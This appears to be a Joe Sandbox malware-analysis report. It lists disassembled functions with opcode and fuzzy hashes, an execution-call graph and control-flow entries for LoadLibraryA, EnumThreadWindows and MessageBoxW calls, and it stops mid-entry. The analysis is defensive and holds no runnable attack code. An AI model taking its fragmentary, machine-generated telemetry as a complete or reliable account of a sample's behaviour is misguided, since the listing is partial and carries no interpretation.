                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09B35D1 Relevance: .0, Instructions: 23COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.564554484.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff9f09b0000_12.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d3882728f777a3242457fbd50cd8d87bcf24cfa20fb68a2e468bef4f0f79aa9d
                                                          • Instruction ID: 09fe5c4c9493014e04a2175f11165e5185fe2adb62140d96ca324372fab1a821
                                                          • Opcode Fuzzy Hash: d3882728f777a3242457fbd50cd8d87bcf24cfa20fb68a2e468bef4f0f79aa9d
                                                          • Instruction Fuzzy Hash: BDE0DFB1448300CBE314E664C88579972A0FF90311F104539D1ABC22A2EAB4F6468680
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09B9E3E Relevance: .0, Instructions: 23COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.564554484.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff9f09b0000_12.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 06b6ac7e3cf40d3fe57c56694ccc05431c9b4cf704df1b906dfe69945b4c92f6
                                                          • Instruction ID: 4b270f59e236a18ed973773869a7df64c5aaa714d5899728c910ef423b376cd3
                                                          • Opcode Fuzzy Hash: 06b6ac7e3cf40d3fe57c56694ccc05431c9b4cf704df1b906dfe69945b4c92f6
                                                          • Instruction Fuzzy Hash: C3E04F7282D58746E3A4963C180222573D8FF89320B6414BDDD5FCB3E2EE2EFD829046
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09B6810 Relevance: .0, Instructions: 23COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.564554484.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff9f09b0000_12.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 60dfd591f86e880dfd49828aa680da8e584d36b0ac7d9797eca93436ccb54610
                                                          • Instruction ID: 859676e2ec9797842fc52d8b9b5e2605556af4ae746f2f90dee887a14d5f65a8
                                                          • Opcode Fuzzy Hash: 60dfd591f86e880dfd49828aa680da8e584d36b0ac7d9797eca93436ccb54610
                                                          • Instruction Fuzzy Hash: 4EE0DF30B0860A4BD308DA5DC6801A9768BE7E1330B24C332C125CB3E9FC78BA494680
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09B1FD1 Relevance: .0, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.564554484.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff9f09b0000_12.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4a319635570e2ae086744f9f823ccf38414bb5bfb4d737591bc96c73b0cea513
                                                          • Instruction ID: 1fd1a9a6eb291c884369c009d42bce33e9b7daec74d39de1304c3d6a63d8aa58
                                                          • Opcode Fuzzy Hash: 4a319635570e2ae086744f9f823ccf38414bb5bfb4d737591bc96c73b0cea513
                                                          • Instruction Fuzzy Hash: 57D0C2A6D0D84102FB38905C240227C0B4DDB497B0B54527ACDBA973F36C8C3A835281
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09B33D6 Relevance: .0, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.564554484.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff9f09b0000_12.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 47019774e4242b89c35eb72618880ca7ddeac83c61bca311747ce3ea9c00d84a
                                                          • Instruction ID: de4bd5afea67838aa2e85ece072212ec5ed207c960954c47861a845c8fe290f3
                                                          • Opcode Fuzzy Hash: 47019774e4242b89c35eb72618880ca7ddeac83c61bca311747ce3ea9c00d84a
                                                          • Instruction Fuzzy Hash: B4E0867062C7404B930CDE1CD8D1126B7E9EBC8B14B10583DF5C7C77A1D970F8018642
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09B732A Relevance: .0, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.564554484.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff9f09b0000_12.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 87ae1e78748d801c7d4f23469ca35b7ed8e39a8fce311f28ad21b886a4306a3a
                                                          • Instruction ID: b7043a5e5917475b90d0b905063cc97f14ba6210bf99530cd99590eb2d3b82ee
                                                          • Opcode Fuzzy Hash: 87ae1e78748d801c7d4f23469ca35b7ed8e39a8fce311f28ad21b886a4306a3a
                                                          • Instruction Fuzzy Hash: FDD05EA2E1C8830BF7F0CA2D64852509AD6EF557E03952174A66ACB3F5FC5D7D421180
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09B2035 Relevance: .0, Instructions: 18COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.564554484.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff9f09b0000_12.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 20f071de50da7fc52e97e329c067d74863f74fb6eb32247a37ed0eca3f21f0ce
                                                          • Instruction ID: 1e6f109e5f9c78eb91c0c483b73d613b7fc808894f8c096ead8f0e11838c54c1
                                                          • Opcode Fuzzy Hash: 20f071de50da7fc52e97e329c067d74863f74fb6eb32247a37ed0eca3f21f0ce
                                                          • Instruction Fuzzy Hash: F9D0A793E0D81107EB3CA05C2452268074ADB98B70B555336DD7EDB3F3EC8C2D434281
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09B9AE7 Relevance: .0, Instructions: 16COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.564554484.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff9f09b0000_12.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3e7970669659fc98ebd5cbfe964f890b65428e8389baa0822f2443516c68970c
                                                          • Instruction ID: 847f98006800965bd49ee20c6a2832b6e62dd87c45d8752e94e8231f15ab5172
                                                          • Opcode Fuzzy Hash: 3e7970669659fc98ebd5cbfe964f890b65428e8389baa0822f2443516c68970c
                                                          • Instruction Fuzzy Hash: D8D0A972B2C90907D719AB296091028B3C2FFC8F00B29002CD089832D6CE2428028246
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09B68A5 Relevance: .0, Instructions: 15COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.564554484.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff9f09b0000_12.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 15bb1ea1d98950c654af34d6a86c3d1c3625de2546d57398b196b141e08760a8
                                                          • Instruction ID: 66dcc8fc5556455749f88a95be69fb71442616549939356248cae2160dcf2c2a
                                                          • Opcode Fuzzy Hash: 15bb1ea1d98950c654af34d6a86c3d1c3625de2546d57398b196b141e08760a8
                                                          • Instruction Fuzzy Hash: B6D05E20B1C40A07E668BF2880A63BDA0875FC4380F24C03FD01FC32E6CD6868020252
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09B3B2E Relevance: .0, Instructions: 13COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.564554484.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff9f09b0000_12.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 78a50c879e68f0753ec09682d1da8ef6077084e6e6d8a964d4130911a3afcccc
                                                          • Instruction ID: 8d5d4511cad1d2282b55191e7ff4a1b4cd9870f4508f3f6d2e4533f4f603e54f
                                                          • Opcode Fuzzy Hash: 78a50c879e68f0753ec09682d1da8ef6077084e6e6d8a964d4130911a3afcccc
                                                          • Instruction Fuzzy Hash: 6FD0A73185C2024BD31CB6344512131311A5F49320B60A47DD147422E3DCB9F1424142
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09B3444 Relevance: .0, Instructions: 12COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.564554484.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff9f09b0000_12.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5d85bfe9b637445126a4191a8297a2914880b13deb8ec0edd293068e368e1641
                                                          • Instruction ID: 3ad12c01aea58a03afa09ff31c9e2ffc05b97f054f537d5c0d6bf90cc5b5447e
                                                          • Opcode Fuzzy Hash: 5d85bfe9b637445126a4191a8297a2914880b13deb8ec0edd293068e368e1641
                                                          • Instruction Fuzzy Hash: 2AD0A93213C28293D308FA1488425BA3354FB60349F20242EA24BCA6A2D914A1428A07
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09B39A6 Relevance: .0, Instructions: 11COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.564554484.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff9f09b0000_12.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 268209eec25a4de14f852accf70ed16cae5b2aed0ad14c7150173627456d02ed
                                                          • Instruction ID: 750769c39ad45a35c7a07a8433a745b04a28c5567486d7038c4a90b01bce1594
                                                          • Opcode Fuzzy Hash: 268209eec25a4de14f852accf70ed16cae5b2aed0ad14c7150173627456d02ed
                                                          • Instruction Fuzzy Hash: DEC0123650860647E218D9294441120715AAB81210761513CD267C62E1E939F5569541
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09B2E79 Relevance: .0, Instructions: 11COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.564554484.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff9f09b0000_12.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 66f605357df00c6cc59abef83241bd908f82324c90709ffa4c5a6b7f912dba59
                                                          • Instruction ID: f9362f9e6af877c3b09322b8eb1bd1541238d2c434a52fff2ead3922ae09c321
                                                          • Opcode Fuzzy Hash: 66f605357df00c6cc59abef83241bd908f82324c90709ffa4c5a6b7f912dba59
                                                          • Instruction Fuzzy Hash: F2C0127054810299931C562C0D066247255DBC57203258175FB6FE63F28EB5F68284C5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09B87B4 Relevance: .0, Instructions: 11COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.564554484.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff9f09b0000_12.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8e2eb639f27398eae11f47f4ff668cffd05dc3263abd52e84ef5ab5a98e33a58
                                                          • Instruction ID: e174968d0f743fda1b8f37d1ebb44d0d10b7e25a8333ab52cbdbda5540a94f07
                                                          • Opcode Fuzzy Hash: 8e2eb639f27398eae11f47f4ff668cffd05dc3263abd52e84ef5ab5a98e33a58
                                                          • Instruction Fuzzy Hash: 5FC0923134081D8FC680EB4CF884984B7E4FB4D22238211A2E40DCB226C365DCD2CB81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09B1FDA Relevance: .0, Instructions: 11COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.564554484.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff9f09b0000_12.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c02030f6bd6f338ac2990361d7b49e1e2c9c63f1bb1da88b931599e909c017c1
                                                          • Instruction ID: b610cc6a00889aab7089a77309cdf9d22388d0e41217a4352840c9731c3e3f4e
                                                          • Opcode Fuzzy Hash: c02030f6bd6f338ac2990361d7b49e1e2c9c63f1bb1da88b931599e909c017c1
                                                          • Instruction Fuzzy Hash: 04C08C35E0C4258B832C9824402222A10498B45314F2050BECA0BA73F7DCA4AE4287C5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09B7213 Relevance: .0, Instructions: 10COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.564554484.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff9f09b0000_12.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1a211a4f9d2f88a2fa258b08fae0cda2149266a50b37db258e787d8e79be81e5
                                                          • Instruction ID: 1fbce2d32484808baa4df0b4837afd7fc9ea6edea1002d137b6be901abbfeead
                                                          • Opcode Fuzzy Hash: 1a211a4f9d2f88a2fa258b08fae0cda2149266a50b37db258e787d8e79be81e5
                                                          • Instruction Fuzzy Hash: D0C09BD7D1D40707D3D0D65D544377045C6F7E47547555170A25DD73E6FC58AD4601C0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09B3339 Relevance: .0, Instructions: 10COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.564554484.00007FF9F09B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff9f09b0000_12.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5fd39ff79cdc256b1dc982e5da9a5bd1f973d88dfed49709d0284e42a0839b0a
                                                          • Instruction ID: c637154c4fc1599fd4219f0f4d8d04063ef6a46e8e01289536cf4aa38c95ed74
                                                          • Opcode Fuzzy Hash: 5fd39ff79cdc256b1dc982e5da9a5bd1f973d88dfed49709d0284e42a0839b0a
                                                          • Instruction Fuzzy Hash: 03C04C747087058BE3599A1D44405757295EF86715720063CE2AAC27E1DD6AF9869604
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Execution Graph

                                                          Execution Coverage:14.2%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:74
                                                          Total number of Limit Nodes:3
                                                          execution_graph 18419 9827fe0 18420 9828025 MessageBoxW 18419->18420 18422 982806c 18420->18422 18459 9820910 18460 9820919 18459->18460 18461 98209a1 18460->18461 18465 9821019 18460->18465 18470 9821028 18460->18470 18475 98210a4 18460->18475 18466 9820ffe 18465->18466 18466->18465 18481 9824ef0 18466->18481 18486 9824f14 18466->18486 18467 9821098 18467->18461 18471 9821037 18470->18471 18473 9824ef0 OleInitialize 18471->18473 18474 9824f14 OleInitialize 18471->18474 18472 9821098 18472->18461 18473->18472 18474->18472 18476 98210b2 18475->18476 18477 9821062 18475->18477 18479 9824ef0 OleInitialize 18477->18479 18480 9824f14 OleInitialize 18477->18480 18478 9821098 18478->18461 18479->18478 18480->18478 18482 9824ef5 18481->18482 18483 982513f 18482->18483 18491 9825c60 18482->18491 18495 9825c70 18482->18495 18483->18467 18487 9824f52 18486->18487 18488 982513f 18487->18488 18489 9825c60 OleInitialize 18487->18489 18490 9825c70 OleInitialize 18487->18490 18488->18467 18489->18488 18490->18488 18492 9825c79 18491->18492 18499 982571c 18492->18499 18496 9825c79 18495->18496 18497 982571c OleInitialize 18496->18497 18498 9825c84 18497->18498 18498->18483 18500 9825727 18499->18500 18501 9826952 18500->18501 18503 98266ec 18500->18503 18505 98266f7 18503->18505 18504 9826a31 18504->18501 18505->18504 18508 98267c4 18505->18508 18507 9826a54 18509 98267cf 18508->18509 18510 9826d6b 18509->18510 18512 98267e0 18509->18512 18510->18507 18513 9826da0 OleInitialize 18512->18513 18514 9826e04 18513->18514 18514->18510 18515 9825f70 DuplicateHandle 18516 9826006 18515->18516 18423 69c7d70 18424 69c7d8e 18423->18424 18427 69c615c 18424->18427 18426 69c7dc5 18429 69c9890 LoadLibraryA 18427->18429 18430 69c9989 18429->18430 18431 982698f 18434 98266fc 18431->18434 18435 9826707 18434->18435 18440 9827b60 18435->18440 18444 9827c49 18435->18444 18451 9827b58 18435->18451 18436 982699c 18441 9827baf 18440->18441 18455 982684c 18441->18455 18445 9827c11 18444->18445 18446 9827c4f EnumThreadWindows 18444->18446 18447 9827c30 18445->18447 18448 982684c EnumThreadWindows 18445->18448 18450 9827cd0 18446->18450 18447->18436 18448->18447 18450->18436 18452 9827baf 18451->18452 18453 982684c EnumThreadWindows 18452->18453 18454 9827c30 18453->18454 18454->18436 18456 9827c50 EnumThreadWindows 18455->18456 18458 9827c30 18456->18458 18458->18436

                                                          Executed Functions

                                                          Function 069C615C Relevance: 1.6, APIs: 1, Instructions: 97libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1675 69c615c-69c98e7 1677 69c98e9-69c990e 1675->1677 1678 69c993b-69c9987 LoadLibraryA 1675->1678 1677->1678 1681 69c9910-69c9912 1677->1681 1682 69c9989-69c998f 1678->1682 1683 69c9990-69c99c1 1678->1683 1684 69c9914-69c991e 1681->1684 1685 69c9935-69c9938 1681->1685 1682->1683 1687 69c99d1 1683->1687 1688 69c99c3-69c99c7 1683->1688 1689 69c9920 1684->1689 1690 69c9922-69c9931 1684->1690 1685->1678 1694 69c99d2 1687->1694 1688->1687 1692 69c99c9 1688->1692 1689->1690 1690->1690 1693 69c9933 1690->1693 1692->1687 1693->1685 1694->1694
                                                          APIs
                                                          • LoadLibraryA.KERNELBASE(?), ref: 069C9977
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.707697411.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_69c0000_AppLaunch.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: 12b6be1bd0d3eb86b84771369368d088b2520acce0dba5b109821170d6800f34
                                                          • Instruction ID: a8ed21fdb407f026d938493f5303e2aa6a250cfc0a58c0fff36e596715320714
                                                          • Opcode Fuzzy Hash: 12b6be1bd0d3eb86b84771369368d088b2520acce0dba5b109821170d6800f34
                                                          • Instruction Fuzzy Hash: 2E4168B1D006588FDB64CFA9C88479EBBF5FB48314F10842DE819A7780D7749845CF92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 069C9884 Relevance: 1.6, APIs: 1, Instructions: 97libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1695 69c9884-69c98e7 1697 69c98e9-69c990e 1695->1697 1698 69c993b-69c9987 LoadLibraryA 1695->1698 1697->1698 1701 69c9910-69c9912 1697->1701 1702 69c9989-69c998f 1698->1702 1703 69c9990-69c99c1 1698->1703 1704 69c9914-69c991e 1701->1704 1705 69c9935-69c9938 1701->1705 1702->1703 1707 69c99d1 1703->1707 1708 69c99c3-69c99c7 1703->1708 1709 69c9920 1704->1709 1710 69c9922-69c9931 1704->1710 1705->1698 1714 69c99d2 1707->1714 1708->1707 1712 69c99c9 1708->1712 1709->1710 1710->1710 1713 69c9933 1710->1713 1712->1707 1713->1705 1714->1714
                                                          APIs
                                                          • LoadLibraryA.KERNELBASE(?), ref: 069C9977
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.707697411.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_69c0000_AppLaunch.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: 2f5d534c5cc7f6247daacbf6a3b5c6f940be9a8a52f5747a04975d289184b30c
                                                          • Instruction ID: 4bb65ec7092c94ece1ee05706caa5630db6138eab66ce56608d5a7c69effe9ce
                                                          • Opcode Fuzzy Hash: 2f5d534c5cc7f6247daacbf6a3b5c6f940be9a8a52f5747a04975d289184b30c
                                                          • Instruction Fuzzy Hash: 5D4177B1D006498FDB54CFA9C88479EBBF5FB48314F108029D819E7780D7789842CF82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09826868 Relevance: 1.6, APIs: 1, Instructions: 80threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1715 9826868-9826871 1717 9826873-982687f 1715->1717 1718 9826835 1715->1718 1723 9827c50-9827c92 1717->1723 1719 9826837-9826853 1718->1719 1720 98267f9-98267fa 1718->1720 1719->1723 1724 9827c94 1723->1724 1725 9827c9e-9827cce EnumThreadWindows 1723->1725 1728 9827c9c 1724->1728 1726 9827cd0-9827cd6 1725->1726 1727 9827cd7-9827d04 1725->1727 1726->1727 1728->1725
                                                          APIs
                                                          • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E28,?,?,09827C30,07B96D30,06C24D5C), ref: 09827CC1
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.709182296.0000000009820000.00000040.00000800.00020000.00000000.sdmp, Offset: 09820000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9820000_AppLaunch.jbxd
                                                          Similarity
                                                          • API ID: EnumThreadWindows
                                                          • String ID:
                                                          • API String ID: 2941952884-0
                                                          • Opcode ID: eadc864623c8bcee450989e1458b77e2f4c61c657552b7627ef8cc5fd88739dc
                                                          • Instruction ID: 5f2b5976cfdd15dfdc3e0971c9066838b59d505703e66b39b9cef12314bfe753
                                                          • Opcode Fuzzy Hash: eadc864623c8bcee450989e1458b77e2f4c61c657552b7627ef8cc5fd88739dc
                                                          • Instruction Fuzzy Hash: 813198719002198FCB10CFAAC884BEEBBF9FB98354F04842ED415E7351D774A984CB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09827C49 Relevance: 1.6, APIs: 1, Instructions: 79threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1731 9827c49-9827c4d 1732 9827c11-9827c29 1731->1732 1733 9827c4f-9827c92 1731->1733 1734 9827c30-9827c3d 1732->1734 1735 9827c2b call 982684c 1732->1735 1736 9827c94 1733->1736 1737 9827c9e-9827cce EnumThreadWindows 1733->1737 1735->1734 1740 9827c9c 1736->1740 1738 9827cd0-9827cd6 1737->1738 1739 9827cd7-9827d04 1737->1739 1738->1739 1740->1737
                                                          APIs
                                                          • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E28,?,?,09827C30,07B96D30,06C24D5C), ref: 09827CC1
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.709182296.0000000009820000.00000040.00000800.00020000.00000000.sdmp, Offset: 09820000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9820000_AppLaunch.jbxd
                                                          Similarity
                                                          • API ID: EnumThreadWindows
                                                          • String ID:
                                                          • API String ID: 2941952884-0
                                                          • Opcode ID: 788fdadb5a8540a80ff9a91dce4ecb9cd16a35dee8a69dc981a01e737c51d62d
                                                          • Instruction ID: 4b89d334579879fdf598331c999dea2eb09ae34f62e83abc48a72926c114b7b7
                                                          • Opcode Fuzzy Hash: 788fdadb5a8540a80ff9a91dce4ecb9cd16a35dee8a69dc981a01e737c51d62d
                                                          • Instruction Fuzzy Hash: C5313471900219CFDB10CFA9D844AEEFBF5EB88324F14842AD529E7350D374A945CF61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09827FD9 Relevance: 1.6, APIs: 1, Instructions: 77windowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1743 9827fd9-9827fdd 1744 9827fa1-9827fa3 1743->1744 1745 9827fdf-9828023 1743->1745 1746 9827fa5-9827faf 1744->1746 1747 9827fcb-9827fcf 1744->1747 1748 9828025-9828028 1745->1748 1749 982802b-982802f 1745->1749 1746->1747 1755 9827fb1-9827fca 1746->1755 1748->1749 1750 9828031-9828034 1749->1750 1751 9828037-982806a MessageBoxW 1749->1751 1750->1751 1753 9828073-9828087 1751->1753 1754 982806c-9828072 1751->1754 1754->1753
                                                          APIs
                                                          • MessageBoxW.USER32(?,00000000,00000000,?), ref: 0982805D
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.709182296.0000000009820000.00000040.00000800.00020000.00000000.sdmp, Offset: 09820000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9820000_AppLaunch.jbxd
                                                          Similarity
                                                          • API ID: Message
                                                          • String ID:
                                                          • API String ID: 2030045667-0
                                                          • Opcode ID: e15ff8c34b41788ceb73778b42dc9c10521c69c52b2965fbee1d1ebd284f0705
                                                          • Instruction ID: a172d2013acea83533a4be97a98a94d0ef8810223b1319adb92fcb5401366465
                                                          • Opcode Fuzzy Hash: e15ff8c34b41788ceb73778b42dc9c10521c69c52b2965fbee1d1ebd284f0705
                                                          • Instruction Fuzzy Hash: 723147B69002198FCB14CFA9D484ADEBBF5FF58314F10846EE919E7710C335A985CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0982683F Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1759 982683f-9827c92 1761 9827c94 1759->1761 1762 9827c9e-9827cce EnumThreadWindows 1759->1762 1765 9827c9c 1761->1765 1763 9827cd0-9827cd6 1762->1763 1764 9827cd7-9827d04 1762->1764 1763->1764 1765->1762
                                                          APIs
                                                          • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E28,?,?,09827C30,07B96D30,06C24D5C), ref: 09827CC1
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.709182296.0000000009820000.00000040.00000800.00020000.00000000.sdmp, Offset: 09820000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9820000_AppLaunch.jbxd
                                                          Similarity
                                                          • API ID: EnumThreadWindows
                                                          • String ID:
                                                          • API String ID: 2941952884-0
                                                          • Opcode ID: 524b8d88308e3c6cc24683e9a81e6c89486956d3fb3078c91e420d603e9ba96b
